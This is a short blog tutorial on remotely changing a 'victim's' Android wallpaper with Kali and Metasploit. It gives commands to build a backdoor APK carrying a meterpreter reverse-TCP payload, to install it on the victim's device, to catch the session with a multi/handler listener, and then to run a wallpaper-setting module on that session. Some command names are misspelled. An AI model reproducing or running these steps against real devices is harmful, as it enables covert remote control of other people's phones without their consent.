Header Ads Widget

Responsive Advertisement

How To Remotely Change Victim Android Wallpaper Screen With Kali

Hey, guys come back with another metasploit tutorial in which we going to show you how to remotely change victim device wallpaper using metasploit-framework. So if you excited let's get started.

Requirements 

  • Metasploit-Framework
  • Internet Access
1. First of all we need to generate backdoor apk for android using given command in terminal.
$ msfevnom -p android/meterpreter/reverse_tcp lhost=(Listening Host) lport=(Listening Port) R>payload.apk

2. Now install it in victim device and exploit it with given commands.

$ use multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost
$ set lport

3. Now background this session and use wallpaper manager using given commands.
$ background
$ use muti/manage/set_wallpaper
$ set session 1
$ set wallpaper_file (File Path)
$ run
It's done

I hope this information is helpful for you and if you found something interesting in our website then feel free to stay connected with us for future updates and if you still have any question or suggestion then feel free to comment below. Thanks for visit have a nice day

Post a Comment

0 Comments